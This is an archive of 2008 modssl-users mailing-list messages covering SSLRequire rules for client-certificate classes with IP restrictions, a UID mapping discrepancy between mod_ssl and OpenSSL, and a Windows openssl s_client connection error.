Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX19nDaaEP8yr5EnRX0HPiytFyjahTyMqbBo@vpn-14-17.rdu.redhat.com [10.11.14.17])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m47FM5SD020356;
	Wed, 7 May 2008 11:22:05 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68)
	(envelope-from )
	id 1JtlT2-0004SJ-IN; Wed, 07 May 2008 16:22:04 +0100
Date: Wed, 7 May 2008 16:22:04 +0100
From: Joe Orton 
To: =?utf-8?B?RnLDqWTDqXJpcXVl?= Da Luene 
Cc: modssl-users@modssl.org
Subject: Re: SSLRequire, client certs and dynamic IP addresses
Message-ID: <20080507152204.GB14618@redhat.com>
Mail-Followup-To: =?utf-8?B?RnLDqWTDqXJpcXVl?= Da Luene ,
	modssl-users@modssl.org
References: <211243.50444.qm@web23208.mail.ird.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <211243.50444.qm@web23208.mail.ird.yahoo.com>
User-Agent: Mutt/1.5.17 (2007-11-01)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, May 06, 2008 at 05:02:55PM +0200, Frédérique Da Luene wrote:
> Hello,
> 
> We are trying to set up mod_ssl to get some "proper"
> access to two classes of users. 
> 
> First, everybody must use client certs (signed by our
> CA). Client cert control is okay and works properly
> (SSLVerifyClient require, SSLVerifyDepth 1 and such).
> 
> Now, we have two classes of client certs, based on the
> OU. Say, OU="Class 1" and OU="Class 2". We want to
> allow :
> - all users with "Class 1" certificates, and
> - users with "Class 2" certs ONLY when they are
> browsing from some IP addresses.
> 
> Those IP addresses are not known in advance, and may
> be dynamic. Let's say we have an external list
> (updated by some mean, irrelevant to our problem). How
> can we check this list and correlate it with the OU
> from the client cert ? We thought that something like
> 
> SSLRequire %{SSL_CLIENT_S_DN_OU} eq "Class 1"
>   or ( %{SSL_CLIENT_S_DN_OU} eq "Class 2"
>        and %{REMOTE_ADDR} in { file("/tmp/list") } )
> 
> (where /tmp/list is a list of allowed IP addresses)
> would be the way to go, but this utterly fails.

>From looking at the code, I don't think that would work as you expect.

If /tmp/list contained "addr1 addr2 addr3", it would be equivalent to

  and %{REMOTE_ADDR} in { "addr1 addr2 addr3" }

i.e.  a direct match against the entire file contents, not

  and %{REMOTE_ADDR} in { "addr", "addr2", "addr3" }

which is what you'd need.  

It might be possible to express this requirement using some combination 
of Require/Satisfy, or failing that, mod_rewrite; I'd recommend asking 
on the httpd users' list instead:

  http://httpd.apache.org/lists.html#http-users

if nothing works out you could file a bug, it might be possible to 
enhance mod_ssl to make this work somehow.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 19 10:14:50 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0BE1F14DA3D; Mon, 19 May 2008 10:14:50 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id 2677D14D9E8
	for ; Mon, 19 May 2008 10:14:48 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 41BB61C670E
	for ; Mon, 19 May 2008 10:14:22 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id L-mR7JXD0ZYq for ;
	Mon, 19 May 2008 10:13:58 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 00CBD1C6605
	for ; Mon, 19 May 2008 10:13:57 +0200 (CEST)
Message-ID: <483136B9.5020408@stroeder.com>
Date: Mon, 19 May 2008 10:13:45 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Extracting SSL_CLIENT_S_DN_UID does not work
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

HI!

(Re-sent since my message through gmane didn't come through.)

Maybe I'm overlooking the obvious but it seems that env var
SSL_CLIENT_S_DN_UID is not set when using a client cert for authentication.

The following env vars displayed in my SSI HTML text are relevant here
(obfuscated to protect privacy):

SSL_CLIENT_S_DN: /O=Company Name/OU=Authc/UID=userid/CN=Full name
SSL_CLIENT_S_DN_UID: (none)

Is it caused by UID not being the leaf RDN?

Ciao, Michael.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 21:54:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B2DFC14DA4C; Thu, 22 May 2008 21:54:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailgate2.tumbleweed.com (tumbleweed1.tumbleweed.com [216.148.213.196])
	by master.modssl.org (Postfix) with ESMTP id EE49614D85E
	for ; Thu, 22 May 2008 21:54:51 +0200 (CEST)
X-WSS-ID: 0K1ACMP-1H-OB6-01
Received: from mms2-dmz.tumbleweed.com (mms2-dmz.tumbleweed.com [10.48.5.6])
	by mailgate2.tumbleweed.com (Tumbleweed MailGate 3.5.1) with ESMTP id 2602B1F7450F
	for ; Thu, 22 May 2008 12:54:25 -0700 (PDT)
Received: from [10.1.5.71] by mms2-dmz.tumbleweed.com with ESMTP (
 Tumbleweed MMS SMTP Relay (Email Firewall v6.3.2)); Thu, 22 May 2008
 13:11:03 -0700
X-Server-Uuid: 3C0E46F7-7DEE-4E70-B06C-CF322D7B505E
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: file descriptor error # 10061 under Win 2003 & WinXP
Date: Thu, 22 May 2008 12:54:13 -0700
Message-ID: <371D08BFE354B24AAF56B7EED34122900A57CD13@RWCEXVS01.corp.tumbleweed.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: file descriptor error # 10061 under Win 2003 & WinXP
Thread-Index: Aci7tvgGbkhI8LMJRgOeiFeH+ltBQg==
From: "Phil Lefort" 
To: modssl-users@modssl.org
X-WSS-ID: 642B0CDD2BK2466985-01-03
Content-Type: multipart/alternative;
 boundary="----_=_NextPart_001_01C8BC45.9BE3348C"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Phil Lefort" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C8BC45.9BE3348C
Content-Type: text/plain;
 charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Hi,
=20
I ran across an issue with 2.0.63 where after installing it, I was able
to successfully start the httpd server.
However, I was unable to use openssl s_client to debug my environment.
I also ran this command both under
Windows XP & Windows 2003 for Apache 2.28.
=20
C:\Program Files\Apache Software Foundation\Apache2.2\bin>openssl
s_client -conn
ect localhost:443 -state -debug
Loading 'screen' into random state - done
connect: Bad file descriptor
connect:errno=3D10061
=20
Please explain to me why I am running into this error.
=20
Thanks.
=20
Phil Lefort

"Tumbleweed Communications " made the following
 annotations on 05/22/08, 13:11:08
---------------------------------------------------------------------------=
---
=3D=3D=3D Tumbleweed Communications Disclaimer =3D=3D=3D=20

This e-mail, including attachments, may include confidential and/or =
proprietary information, and may be used only by the person or entity to =
which it is addressed.  If the reader of this e-mail is not the intended =
recipient or his or her authorized agent, the reader is hereby notified tha=
t=
 any dissemination, distribution or copying of this e-mail is prohibited. I=
=66=
 you have received this e-mail in error, please notify the sender by =
replying to this message and delete this e-mail immediately.=20
=20

Tumbleweed Communications Corp., an industry leader in managed file
transfer and content security, provides enterprise-class solutions to
organizations of all sizes. Tumbleweed's innovative products enable
organizations to effectively manage and protect business-critical
Internet communications, with capabilities that span secure file
transfer, encryption, data loss prevention, and email security.


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D

------_=_NextPart_001_01C8BC45.9BE3348C
Content-Type: text/html;
 charset=us-ascii
Content-Transfer-Encoding: quoted-printable







Hi,


 


I ran =
across an=20
issue with 2.0.63 where after installing it, I was able to successfully =
start=20
the httpd server.


However, =
I=
 was=20
unable to use openssl s_client to debug my environment.  I also ran =
this=20
command both under


Windows X=
P=
 &=20
Windows 2003 for Apache 2.28.


 




C:\Program=20
=46iles\Apache Software Foundation\Apache2.2\bin>openssl s_client =
-conn
ect=20
localhost:443 -state -debug
Loading 'screen' into random state -=20
done
connect: Bad file=20
descriptor
connect:errno=3D10061


 


Please=20
explain to me why I am running into this error.


 


Thanks.


 


Phil=20
Lefort


"Tumbleweed Communications <tumbleweed.com>" made the =
=66ollowing
 annotations on 05/22/08, 13:11:08
---------------------------------------------------------------------------=
---

=3D=3D=3D Tumbleweed Communications Disclaimer =3D=3D=3D 

This e-mail, including attachments, may include confidential and/or =
proprietary information, and may be used only by the person or entity to =
which it is addressed.  If the reader of this e-mail is not the intended =
recipient or his or her authorized agent, the reader is hereby notified tha=
t=
 any dissemination, distribution or copying of this e-mail is prohibited. I=
=66=
 you have received this e-mail in error, please notify the sender by =
replying to this message and delete this e-mail immediately. 
 

Tumbleweed Communications Corp., an industry leader in managed file
transfer and content security, provides enterprise-class solutions to
organizations of all sizes. Tumbleweed's innovative products enable
organizations to effectively manage and protect business-critical
Internet communications, with capabilities that span secure file
transfer, encryption, data loss prevention, and email security.


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D



------_=_NextPart_001_01C8BC45.9BE3348C--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 23 11:43:03 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F414414DA62; Fri, 23 May 2008 11:43:02 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 8A79C14D866
	for ; Fri, 23 May 2008 11:43:02 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m4N9gYNO021446;
	Fri, 23 May 2008 05:42:34 -0400
Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX19A6qFocNseijY3zUicycev58Fq7zL7i4g@vpn-14-30.rdu.redhat.com [10.11.14.30])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m4N9gUbS008201;
	Fri, 23 May 2008 05:42:31 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68)
	(envelope-from )
	id 1JzTnB-00048I-79; Fri, 23 May 2008 10:42:29 +0100
Date: Fri, 23 May 2008 10:42:29 +0100
From: Joe Orton 
To: Michael =?utf-8?Q?Str=C3=B6der?= 
Cc: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
Message-ID: <20080523094229.GA15459@redhat.com>
Mail-Followup-To: Michael =?utf-8?Q?Str=C3=B6der?= ,
	modssl-users@modssl.org
References: <483136B9.5020408@stroeder.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <483136B9.5020408@stroeder.com>
User-Agent: Mutt/1.5.17 (2007-11-01)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, May 19, 2008 at 10:13:45AM +0200, Michael Ströder wrote:
> HI!
>
> (Re-sent since my message through gmane didn't come through.)
>
> Maybe I'm overlooking the obvious but it seems that env var
> SSL_CLIENT_S_DN_UID is not set when using a client cert for authentication.
>
> The following env vars displayed in my SSI HTML text are relevant here
> (obfuscated to protect privacy):
>
> SSL_CLIENT_S_DN: /O=Company Name/OU=Authc/UID=userid/CN=Full name
> SSL_CLIENT_S_DN_UID: (none)
>
> Is it caused by UID not being the leaf RDN?

That shouldn't make any difference.  What versions of OpenSSL and 
httpd/mod_ssl are you using?  The "UID" DN tag is ambiguous and probably 
maps to something other than what your subject DN uses.

In the current 2.x mod_ssl sources, UID maps to:

#ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */
    { "UID",   NID_x500UniqueIdentifier   },
#else /* old name, OpenSSL < 0.9.7 */
    { "UID",   NID_uniqueIdentifier       },
#endif

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 23 16:48:54 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EC69B14DA2B; Fri, 23 May 2008 16:48:53 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id E44D014D866
	for ; Fri, 23 May 2008 16:48:48 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 8096A1C6F07
	for ; Fri, 23 May 2008 16:48:21 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 9d58x70YG0+z for ;
	Fri, 23 May 2008 16:47:35 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id E54FB1C6F04
	for ; Fri, 23 May 2008 16:46:48 +0200 (CEST)
Message-ID: <4836D8D8.4030500@stroeder.com>
Date: Fri, 23 May 2008 16:46:48 +0200
From: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com>
In-Reply-To: <20080523094229.GA15459@redhat.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe,

many thanks for your response.

Joe Orton wrote:
> On Mon, May 19, 2008 at 10:13:45AM +0200, Michael Ströder wrote:
>>
>> Maybe I'm overlooking the obvious but it seems that env var
>> SSL_CLIENT_S_DN_UID is not set when using a client cert for authentication.
>>
>> The following env vars displayed in my SSI HTML text are relevant here
>> (obfuscated to protect privacy):
>>
>> SSL_CLIENT_S_DN: /O=Company Name/OU=Authc/UID=userid/CN=Full name
>> SSL_CLIENT_S_DN_UID: (none)
>>
>> Is it caused by UID not being the leaf RDN?
> 
> That shouldn't make any difference.

Ok, fine.

> What versions of OpenSSL and httpd/mod_ssl are you using?

Actually pre-built RPMs shipped with openSUSE 10.3:

# rpm -q openssl apache2
openssl-0.9.8e-45.5
apache2-2.2.4-70.4

Not sure whether these RPMs are based on sources patched by openSUSE.

>  The "UID" DN tag is ambiguous and probably 
> maps to something other than what your subject DN uses.
> 
> In the current 2.x mod_ssl sources, UID maps to:
> 
> #ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */
>     { "UID",   NID_x500UniqueIdentifier   },
> #else /* old name, OpenSSL < 0.9.7 */
>     { "UID",   NID_uniqueIdentifier       },
> #endif

Hmm, the user ID is already stored by mod_ssl with attribute name "UID" 
in env var SSL_CLIENT_S_DN. Given that it's OpenSSL 0.9.8 and that the 
attribute type seems to be interpreted as UID is it safe to assume that 
the cert contains the right OID?

If NID_x500UniqueIdentifier maps to OID 2.5.4.45 it's plain wrong anyway...

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 23 17:03:00 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6BCFD14DA2B; Fri, 23 May 2008 17:03:00 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 0BA0014D866
	for ; Fri, 23 May 2008 17:02:55 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m4NF2Sok005013;
	Fri, 23 May 2008 11:02:28 -0400
Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX1/BuGUHw3nIlfFsmn0G1vARg6UpVsK36H4@vpn-14-30.rdu.redhat.com [10.11.14.30])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m4NF2RfE029649;
	Fri, 23 May 2008 11:02:27 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68)
	(envelope-from )
	id 1JzYmo-00005T-Gn; Fri, 23 May 2008 16:02:26 +0100
Date: Fri, 23 May 2008 16:02:26 +0100
From: Joe Orton 
To: Michael =?utf-8?Q?Str=C3=B6der?= 
Cc: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
Message-ID: <20080523150226.GC31834@redhat.com>
Mail-Followup-To: Michael =?utf-8?Q?Str=C3=B6der?= ,
	modssl-users@modssl.org
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <4836D8D8.4030500@stroeder.com>
User-Agent: Mutt/1.5.17 (2007-11-01)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, May 23, 2008 at 04:46:48PM +0200, Michael Ströder wrote:
>> In the current 2.x mod_ssl sources, UID maps to:
>>
>> #ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */
>>     { "UID",   NID_x500UniqueIdentifier   },
>> #else /* old name, OpenSSL < 0.9.7 */
>>     { "UID",   NID_uniqueIdentifier       },
>> #endif
>
> Hmm, the user ID is already stored by mod_ssl with attribute name "UID" in 
> env var SSL_CLIENT_S_DN. Given that it's OpenSSL 0.9.8 and that the 
> attribute type seems to be interpreted as UID is it safe to assume that the 
> cert contains the right OID?

No, unfortunately there is disparity between mod_ssl and OpenSSL here.  
(I don't know why; I think historically the short name mappings were not 
unique in OpenSSL possibly, something like that)

OpenSSL uses "UID" for NID_userId (OID mapping an exercise for the 
reader, see obj_mac.h in OpenSSL ;).  So in fact that's the tag used for 
that RDN.

> If NID_x500UniqueIdentifier maps to OID 2.5.4.45 it's plain wrong anyway...

It does indeed map to that OID... wrong in what sense?

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 23 17:10:46 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 79EE714DA2B; Fri, 23 May 2008 17:10:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id 1559E14D866
	for ; Fri, 23 May 2008 17:10:45 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 44B781C6F21
	for ; Fri, 23 May 2008 17:10:18 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id q22j8gJtWYfi for ;
	Fri, 23 May 2008 17:09:38 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id F13CE1C6F0D
	for ; Fri, 23 May 2008 17:09:37 +0200 (CEST)
Message-ID: <4836DE31.9000609@stroeder.com>
Date: Fri, 23 May 2008 17:09:37 +0200
From: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com>
In-Reply-To: <20080523150226.GC31834@redhat.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Fri, May 23, 2008 at 04:46:48PM +0200, Michael Ströder wrote:
>> Hmm, the user ID is already stored by mod_ssl with attribute name "UID" in 
>> env var SSL_CLIENT_S_DN. Given that it's OpenSSL 0.9.8 and that the 
>> attribute type seems to be interpreted as UID is it safe to assume that the 
>> cert contains the right OID?
> 
> No, unfortunately there is disparity between mod_ssl and OpenSSL here.  
> (I don't know why; I think historically the short name mappings were not 
> unique in OpenSSL possibly, something like that)

Hmmpf! So the string representation of SSL_CLIENT_S_DN is completely 
generated by OpenSSL whereas the single attribute types are generated by 
mod_ssl by looking at the cert's OID?

>> If NID_x500UniqueIdentifier maps to OID 2.5.4.45 it's plain wrong anyway...
> 
> It does indeed map to that OID... wrong in what sense?

Because the syntax assigned to attribute type 'x500UniqueIdentifier' 
(OID 2.5.4.45) is 'Bit String' (OID 1.3.6.1.4.1.1466.115.121.1.6) which 
cannot be used to store a user ID with characters like 'ABCDEF'.

http://www.alvestrand.no/objectid/2.5.4.45.html

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 23 17:25:06 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8FF9514DA2B; Fri, 23 May 2008 17:25:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id 38B2214D866
	for ; Fri, 23 May 2008 17:25:06 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 1EF9D1C6F26
	for ; Fri, 23 May 2008 17:24:39 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id Bq4p-XInHN7a for ;
	Fri, 23 May 2008 17:23:53 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 3294C1C6F25
	for ; Fri, 23 May 2008 17:23:35 +0200 (CEST)
Message-ID: <4836E176.6050301@stroeder.com>
Date: Fri, 23 May 2008 17:23:34 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com>
In-Reply-To: <20080523150226.GC31834@redhat.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Fri, May 23, 2008 at 04:46:48PM +0200, Michael Ströder wrote:
>>> In the current 2.x mod_ssl sources, UID maps to:
>>>
>>> #ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */
>>>     { "UID",   NID_x500UniqueIdentifier   },
>>> #else /* old name, OpenSSL < 0.9.7 */
>>>     { "UID",   NID_uniqueIdentifier       },
>>> #endif
>> Hmm, the user ID is already stored by mod_ssl with attribute name "UID" in 
>> env var SSL_CLIENT_S_DN. Given that it's OpenSSL 0.9.8 and that the 
>> attribute type seems to be interpreted as UID is it safe to assume that the 
>> cert contains the right OID?
> 
> No, unfortunately there is disparity between mod_ssl and OpenSSL here.  
> (I don't know why; I think historically the short name mappings were not 
> unique in OpenSSL possibly, something like that)
> 
> OpenSSL uses "UID" for NID_userId (OID mapping an exercise for the 
> reader, see obj_mac.h in OpenSSL ;).  So in fact that's the tag used for 
> that RDN.

Ok, then the OID in my cert is 0.9.2342.19200300.100.1.1 (attribute type 
'uid' specified for pilotPerson). That seems right to me since it's 
compliant with RFC 4514 which contains a table of short and long 
attribute type names and their OIDs (end of chapter 3).

But now I don't understand the #ifdef-statement mentioned above. From my 
understanding it MUST NOT reference NID_x500UniqueIdentifier. It MUST 
reference NID_userId. To me that looks clearly like a bug in mod_ssl.

Ciao, Michael.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

